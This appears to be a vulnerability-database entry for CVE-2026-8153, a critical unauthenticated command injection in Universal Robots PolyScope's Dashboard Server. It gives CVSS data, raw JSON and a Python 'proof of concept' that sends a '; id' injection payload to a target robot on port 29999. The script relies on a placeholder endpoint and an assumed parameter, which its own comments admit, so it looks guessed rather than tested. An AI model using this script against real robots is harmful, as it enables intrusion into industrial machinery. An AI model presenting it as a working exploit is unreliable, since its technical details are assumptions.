Security Vulnerability Report
CVE-2026-8153 CVSS 9.8 CRITICAL

CVE-2026-8153

Published: 2026-05-08 12:16:30
Last Modified: 2026-05-11 10:16:15
Source: 1b7e193f-2525-49a1-b171-84af8827c9eb

Description

OS command injection in the Dashboard Server interface in Universal Robots PolyScope versions prior to 5.25.1 allows an unauthenticated attacker to craft commands that will execute code on the robot's OS.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Universal Robots PolyScope < 5.25.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2026-8153
import requests
import sys

def exploit(target_ip):
    # Targeting the Dashboard Server interface
    # Note: The specific vulnerable endpoint might vary based on configuration
    url = f"http://{target_ip}:29999/vulnerable-endpoint"

    # Payload to execute a simple command (e.g., id)
    # Assuming the 'cmd' parameter is vulnerable to injection
    injection_payload = "; id"

    try:
        print(f"[+] Sending payload to {url}...")
        response = requests.get(url, params={"cmd": injection_payload}, timeout=5)

        if response.status_code == 200:
            print("[+] Request sent successfully. Check response for command execution output.")
            print(response.text)
        else:
            print("[-] Exploit request failed.")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip>")
    else:
        exploit(sys.argv[1])

References

https://www.universal-robots.com/developer/communication-protocol/dashboard-server/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8153", "sourceIdentifier": "1b7e193f-2525-49a1-b171-84af8827c9eb", "published": "2026-05-08T12:16:29.977", "lastModified": "2026-05-11T10:16:15.380", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "OS command injection in Dashboard Server interface in Universal Robots PolyScope versions prior to 5.25.1 allows unauthenticated attacker to craft commands that will execute code on the robot's OS."}], "metrics": {"cvssMetricV31": [{"source": "1b7e193f-2525-49a1-b171-84af8827c9eb", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "1b7e193f-2525-49a1-b171-84af8827c9eb", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.universal-robots.com/developer/communication-protocol/dashboard-server/", "source": "1b7e193f-2525-49a1-b171-84af8827c9eb"}]}}